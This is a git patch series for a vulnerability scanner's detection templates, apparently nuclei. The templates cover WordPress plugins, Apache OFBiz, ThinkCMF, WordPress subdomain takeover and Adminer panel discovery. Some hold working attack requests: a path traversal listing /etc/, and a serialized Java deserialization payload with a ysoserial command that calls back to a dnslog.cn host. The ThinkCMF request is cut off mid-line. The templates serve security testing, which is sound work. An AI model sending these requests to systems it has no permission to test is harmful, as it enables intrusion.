From 2e8c15d5fc76e2bffc9416c23a069d8baeeac875 Mon Sep 17 00:00:00 2001 From: Alan Brian <36174194+alanbriangh@users.noreply.github.com> Date: Sun, 21 Mar 2021 14:51:13 -0300 Subject: [PATCH 01/64] FIX: Add 2020-35489 detection Add 2020-35489 detection --- cves/2020/CVE-2020-35489.yaml | 116 ++++++++++++++++++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 cves/2020/CVE-2020-35489.yaml diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml new file mode 100644 index 0000000000..a85f0dfa06 --- /dev/null +++ b/cves/2020/CVE-2020-35489.yaml @@ -0,0 +1,116 @@ +id: 2020-35489 +info: + name: WordPress Contact Form 7 Plugin - Unrestricted File Upload + author: soyelmago + severity: critical + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 + tags: cve,cve2020,wordpress,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Contact Form 7" + condition: and + part: body + - type: word + words: + - "2.0.7" + - "2.1" + - "2.1.2" + - "2.2" + - "2.2.1" + - "2.3" + - "2.3.1" + - "2.4" + - "2.4.1" + - "2.4.2" + - "2.4.3" + - "2.4.4" + - "2.4.5" + - "2.4.6" + - "3.0" + - "3.0.1" + - "3.0.2" + - "3.1" + - "3.1.1" + - "3.1.2" + - "3.2" + - "3.3" + - "3.3.1" + - "3.3.2" + - "3.3.3" + - "3.4" + - "3.4.1" + - "3.4.2" + - "3.5" + - "3.5.1" + - "3.5.2" + - "3.5.3" + - "3.5.4" + - "3.6" + - "3.7" + - "3.7.1" + - "3.7.2" + - "3.8" + - "3.8.1" + - "3.9" + - "3.9.1" + - "3.9.2" + - "3.9.3" + - "4.0" + - "4.0.1" + - "4.0.2" + - "4.0.3" + - "4.1" + - "4.1.1" + - "4.1.2" + - "4.2" + - "4.2.1" + - "4.2.2" + - "4.3" + - "4.3.1" + - "4.4" + - "4.4.1" + - "4.4.2" + - "4.5" + - "4.5.1" + - "4.6" + - "4.6.1" + - "4.7" + - "4.8" + - "4.8.1" + - "4.9" + - "4.9.1" + - "4.9.2" + - "5.0" + - "5.0.1" + - "5.0.2" + - "5.0.3" + - "5.0.4" + - "5.0.5" + - "5.1" + - "5.1.1" + - "5.1.2" + - "5.1.4" + - "5.1.5" + - "5.1.6" + - "5.1.7" + - "5.1.8" + - "5.1.9" + - "5.2" + - "5.2.1" + - "5.2.2" + - "5.3" + - "5.3.1" + condition: or + part: body + + From 943080c6bd19c8b5bb22f53e39fe240ceab8ab8a Mon Sep 17 00:00:00 2001 From: Alan Brian <36174194+alanbriangh@users.noreply.github.com> Date: Sun, 21 Mar 2021 14:57:32 -0300 Subject: [PATCH 02/64] FIX: Indentation --- cves/2020/CVE-2020-35489.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index a85f0dfa06..6b3c4b6fe6 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -5,7 +5,6 @@ info: severity: critical reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 tags: cve,cve2020,wordpress,plugin - requests: - method: GET path: @@ -112,5 +111,3 @@ requests: - "5.3.1" condition: or part: body - - From f7a508ad1efdee061748ddc14c7ba583a58ec196 Mon Sep 17 00:00:00 2001 From: Alan Brian <36174194+alanbriangh@users.noreply.github.com> Date: Sun, 21 Mar 2021 15:08:38 -0300 Subject: [PATCH 03/64] FIX: Indentation --- cves/2020/CVE-2020-35489.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index 6b3c4b6fe6..de102f664c 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -3,7 +3,8 @@ info: name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 tags: cve,cve2020,wordpress,plugin requests: - method: GET From 1f8170332a4e8c37b42e81a514eaa5b9e30b81da Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 22 Mar 2021 01:21:07 +0530 Subject: [PATCH 04/64] Update CVE-2020-35489.yaml --- cves/2020/CVE-2020-35489.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index de102f664c..e5e97352db 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -1,9 +1,9 @@ id: 2020-35489 info: - name: WordPress Contact Form 7 Plugin - Unrestricted File Upload + name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - reference: + reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 tags: cve,cve2020,wordpress,plugin requests: From 5ae86fcaef055d03728ec603c3cff531dafecb66 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 22 Mar 2021 01:22:38 +0530 Subject: [PATCH 05/64] Update CVE-2020-35489.yaml --- cves/2020/CVE-2020-35489.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml index e5e97352db..f4e2bbd516 100644 --- a/cves/2020/CVE-2020-35489.yaml +++ b/cves/2020/CVE-2020-35489.yaml @@ -1,15 +1,17 @@ -id: 2020-35489 +id: CVE-2020-35489 + info: name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35489 tags: cve,cve2020,wordpress,plugin + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" + matchers-condition: and matchers: - type: status From 53c0e1e954338b2e025817903dc0a6130f20516e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:56:42 +0700 Subject: [PATCH 06/64] :fire: Add CVE-2017-1000170 --- cves/2017/CVE-2017-1000170.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2017/CVE-2017-1000170.yaml diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml new file mode 100644 index 0000000000..ce1200b69f --- /dev/null +++ b/cves/2017/CVE-2017-1000170.yaml @@ -0,0 +1,25 @@ +id: CVE-2017-1000170 + +info: + name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal + author: dwisiswant0 + severity: high + reference: https://www.exploit-db.com/exploits/49693 + description: jqueryFileTree 2.1.5 and older Directory Traversal + tags: cve,cve2017,wp-plugin,traversal + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and + matchers: + - type: word + words: + - "
  • " + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file From 2e233a0aa2a0932ae0505ae919f30d5d26dda904 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:56:56 +0700 Subject: [PATCH 07/64] :hammer: Update matchers --- cves/2017/CVE-2017-1000170.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index ce1200b69f..c92526fa51 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -18,6 +18,7 @@ requests: - type: word words: - "
  • " + - "passwd
    • " condition: and part: body - type: status From e49b4a7d8aa315158ca6ff4c8acbdfcd6ce926b2 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:57:15 +0700 Subject: [PATCH 08/64] :pencil2: Add wordpress to tags --- cves/2017/CVE-2017-1000170.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index c92526fa51..dc365005e0 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -6,7 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wp-plugin,traversal + tags: cve,cve2017,wordpress,wp-plugin,traversal requests: - method: POST From a8149d0cfcadbe0a3fea0f8c70f72f399d7dd63b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:30:15 +0530 Subject: [PATCH 09/64] Create CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cves/2021/CVE-2021-26295.yaml diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml new file mode 100644 index 0000000000..5ab6b8a4ea --- /dev/null +++ b/cves/2021/CVE-2021-26295.yaml @@ -0,0 +1,59 @@ +id: CVE-2021-26295 +info: + name:Apache OFBiz RMI deserializes Arbitrary Code Execution + author: madrobot + severity: critical + tags: apache,cve,cve2021,rce + description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 + + # Note:- This is detection template To perform deserializes + # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot + # hex mad.ot and replace in along with the user in std-String value +requests: + - raw: + - | + POST /webtools/control/SOAPService HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 + Connection: close + Content-Type: application/xml + Content-Length: 910 + + + + + + + + + + bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a + + + + + + + + + + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "OFBiz.Visitor=" + part: header + - type: word + words: + - "null (Illegal hexadecimal character at index 0)" + - "errorMessage" + part: body From d392432b15a1790c95b6ebdcc9b54ed493bc76ef Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:32:09 +0530 Subject: [PATCH 10/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 5ab6b8a4ea..3b224d5fa5 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -1,6 +1,6 @@ id: CVE-2021-26295 info: - name:Apache OFBiz RMI deserializes Arbitrary Code Execution + name: Apache OFBiz RMI deserializes Arbitrary Code Execution author: madrobot severity: critical tags: apache,cve,cve2021,rce From 744e4c504cda48f341910ad0352d838bac825791 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:42:35 +0530 Subject: [PATCH 11/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 3b224d5fa5..06d27c2790 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -7,7 +7,7 @@ info: description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 - # Note:- This is detection template To perform deserializes + # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # hex mad.ot and replace in along with the user in std-String value requests: From a2ab8b67e5fd15e629d10f7252e0c70821097a12 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:42:58 +0530 Subject: [PATCH 12/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 06d27c2790..1e87d42cec 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -30,8 +30,7 @@ requests: - - bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a + bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a From 3f3357f2a6fd7ff3ec2d7a00e21582c698e9dc47 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:48:13 +0530 Subject: [PATCH 13/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 1e87d42cec..634b2cfb13 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -9,7 +9,7 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot - # hex mad.ot and replace in along with the user in std-String value + # `cat mad.ot | hex` and replace in along with the url in std-String value requests: - raw: - | From f6daf90e92ecbb3a506a2a4898fc367ea60685a6 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 17:50:47 +0000 Subject: [PATCH 14/64] Update wordpress-takeover.yaml Better matcher fix. \m/ --- takeovers/wordpress-takeover.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 96fdc32d4d..f1e6462e51 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -12,9 +12,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - 'Do you want to register' - - '*.wordpress.com' - condition: and \ No newline at end of file + + - type: regex + regex: + - "[a-zA-Z0-9][a-zA-Z0-9-_]*\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com" From de9bcdaa5b8f7eb13bcdb29b704a070562023559 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 17:52:57 +0000 Subject: [PATCH 15/64] Update wordpress-takeover.yaml --- takeovers/wordpress-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index f1e6462e51..6ddfd103bb 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -20,4 +20,4 @@ requests: - type: regex regex: - - "[a-zA-Z0-9][a-zA-Z0-9-_]*\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com" + - "[a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com" From 92b21256764b045658c0b457ff52a52b2ecd1f20 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 17:58:48 +0000 Subject: [PATCH 16/64] Update wordpress-takeover.yaml --- takeovers/wordpress-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 6ddfd103bb..226e0737e7 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -2,7 +2,7 @@ id: wordpress-takeover info: name: wordpress takeover detection - author: pdcommunity + author: pdcommunity & geeknik severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz From 7c5e7f48ff0bd1c4eca7725c03838a60b7fa9533 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 18:00:14 +0000 Subject: [PATCH 17/64] Update wordpress-takeover.yaml --- takeovers/wordpress-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 226e0737e7..1d43a86846 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -1,10 +1,10 @@ id: wordpress-takeover info: - name: wordpress takeover detection + name: WordPress takeover detection author: pdcommunity & geeknik severity: high - tags: takeover + tags: takeover,wordpress reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: From c8646b6f92b21ab1987e2e7261d6d70adc215040 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 23 Mar 2021 19:13:34 +0000 Subject: [PATCH 18/64] Update wordpress-takeover.yaml nuclei -t /tmp/wordpress-takeover.yaml -target https://9824q75q435yq2345.wordpress.com [2021-03-23 14:12:16] [wordpress-takeover] [http] [high] https://9824q75q435yq2345.wordpress.com --- takeovers/wordpress-takeover.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 1d43a86846..34205346dd 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}" + redirects: true matchers-condition: and matchers: - type: word From 356856a9836893b592306585467f81924d8f2d20 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 24 Mar 2021 01:10:20 +0000 Subject: [PATCH 19/64] Create thinkcmf-arbitrary-code-execution.yaml --- .../thinkcmf-arbitrary-code-execution.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml diff --git a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml new file mode 100644 index 0000000000..bdd83bd1ef --- /dev/null +++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml @@ -0,0 +1,25 @@ +id: thinkcmf-arbitrary-code-execution + +info: + name: ThinkCMF Arbitrary code execution + author: pikpikcu + severity: high + reference: https://www.shuzhiduo.com/A/l1dygr36Je/ + tags: thinkcmf + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content= Date: Wed, 24 Mar 2021 13:00:26 +0530 Subject: [PATCH 20/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 634b2cfb13..aed35553ad 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -3,13 +3,14 @@ info: name: Apache OFBiz RMI deserializes Arbitrary Code Execution author: madrobot severity: critical - tags: apache,cve,cve2021,rce + tags: apache,cve,cve2021,rce,ofbiz description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + requests: - raw: - | @@ -56,3 +57,4 @@ requests: - "null (Illegal hexadecimal character at index 0)" - "errorMessage" part: body + condition: and From dbaf44593323ee60fa06a49335b9dd2456d44817 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 13:02:29 +0530 Subject: [PATCH 21/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index aed35553ad..8cf8fc5e37 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -10,6 +10,7 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + # Exploit: https://github.com/yumusb/CVE-2021-26295-POC requests: - raw: From 86ad55d66fc836b89c6c4b3974579eda53202ca1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 14:07:22 +0530 Subject: [PATCH 22/64] Adding to workflow --- cves/2017/CVE-2017-1000170.yaml | 2 +- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index dc365005e0..cb3e001dd0 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -6,7 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wordpress,wp-plugin,traversal + tags: cve,cve2017,wordpress,wp-plugin,lfi requests: - method: POST diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 4249d902c9..e6aa4f7d72 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -11,6 +11,7 @@ workflows: matchers: - name: wordpress subtemplates: + - template: cves/2017/CVE-2017-1000170.yaml - template: cves/2018/CVE-2018-3810.yaml - template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6715.yaml From d6931a54c1d23cc017a92df976f711997f572316 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 08:39:41 +0000 Subject: [PATCH 23/64] Auto Update README [Wed Mar 24 08:39:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a5d0c6fb0a..efb74a15e2 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 252 | vulnerabilities | 116 | exposed-panels | 108 | +| cves | 253 | vulnerabilities | 116 | exposed-panels | 108 | | takeovers | 65 | exposures | 63 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 5 | helpers | 3 | iot | 7 | -**79 directories, 827 files**. +**79 directories, 828 files**. From b8dd11c644eef9fe1ea43263cc449b8cd29bdc8b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 14:18:41 +0530 Subject: [PATCH 24/64] Adding adminer-panel-fuzz --- fuzzing/adminer-panel-fuzz.yaml | 46 ++ helpers/wordlists/adminer-paths.txt | 741 ++++++++++++++++++++++++++++ 2 files changed, 787 insertions(+) create mode 100644 fuzzing/adminer-panel-fuzz.yaml create mode 100644 helpers/wordlists/adminer-paths.txt diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml new file mode 100644 index 0000000000..17229354b9 --- /dev/null +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -0,0 +1,46 @@ +id: adminer-panel-fuzz +info: + name: Adminer Login Panel Fuzz + author: random-robbie & meme-lord + severity: info + reference: https://blog.sorcery.ie/posts/adminer/ + tags: fuzz,adminer + + # <= 4.2.4 can have unauthenticated RCE via SQLite driver + # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL + # Most versions have some kind of SSRF usability + # Is generally handy if you find SQL creds + +requests: + + - payloads: + path: helpers/wordlists/adminer-paths.txt + + attack: sniper + threads: 50 + + raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + + matchers-condition: and + matchers: + + - type: word + words: + - "Login - Adminer" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' diff --git a/helpers/wordlists/adminer-paths.txt b/helpers/wordlists/adminer-paths.txt new file mode 100644 index 0000000000..602d7b2d27 --- /dev/null +++ b/helpers/wordlists/adminer-paths.txt @@ -0,0 +1,741 @@ +/_adminer.php +/adm.php +/admin/adminer.php +/adminer-2.0.0.php +/adminer-2.1.0.php +/adminer-2.2.0.php +/adminer-2.2.1.php +/adminer-2.3.0.php +/adminer-2.3.2.php +/adminer-3.0.0.php +/adminer-3.0.1-en.php +/adminer-3.0.1-mysql-en.php +/adminer-3.0.1-mysql.php +/adminer-3.0.1.php +/adminer-3.0.1/ +/adminer-3.1.0-en.php +/adminer-3.1.0-mysql-en.php +/adminer-3.1.0-mysql.php +/adminer-3.1.0.php +/adminer-3.1.0/ +/adminer-3.2.0-en.php +/adminer-3.2.0-mysql-en.php +/adminer-3.2.0-mysql.php +/adminer-3.2.0.php +/adminer-3.2.0/ +/adminer-3.2.1.php +/adminer-3.2.2-en.php +/adminer-3.2.2-mysql-en.php +/adminer-3.2.2-mysql.php +/adminer-3.2.2.php +/adminer-3.2.2/ +/adminer-3.3.0-en.php +/adminer-3.3.0-mysql-en.php +/adminer-3.3.0-mysql.php +/adminer-3.3.0.php +/adminer-3.3.0/ +/adminer-3.3.1-en.php +/adminer-3.3.1-mysql-en.php +/adminer-3.3.1-mysql.php +/adminer-3.3.1.php +/adminer-3.3.1/ +/adminer-3.3.2.php +/adminer-3.3.3-en.php +/adminer-3.3.3-mysql-en.php +/adminer-3.3.3-mysql.php +/adminer-3.3.3.php +/adminer-3.3.3/ +/adminer-3.3.4-en.php +/adminer-3.3.4-mysql-en.php +/adminer-3.3.4-mysql.php +/adminer-3.3.4.php +/adminer-3.3.4/ +/adminer-3.4.0-en.php +/adminer-3.4.0-mysql-en.php +/adminer-3.4.0-mysql.php +/adminer-3.4.0.php +/adminer-3.4.0/ +/adminer-3.5.0.php +/adminer-3.5.1-en.php +/adminer-3.5.1-mysql-en.php +/adminer-3.5.1-mysql.php +/adminer-3.5.1.php +/adminer-3.5.1/ +/adminer-3.6.0.php +/adminer-3.6.1-en.php +/adminer-3.6.1-mysql-en.php +/adminer-3.6.1-mysql.php +/adminer-3.6.1.php +/adminer-3.6.1/ +/adminer-3.6.2-en.php +/adminer-3.6.2-mysql-en.php +/adminer-3.6.2-mysql.php 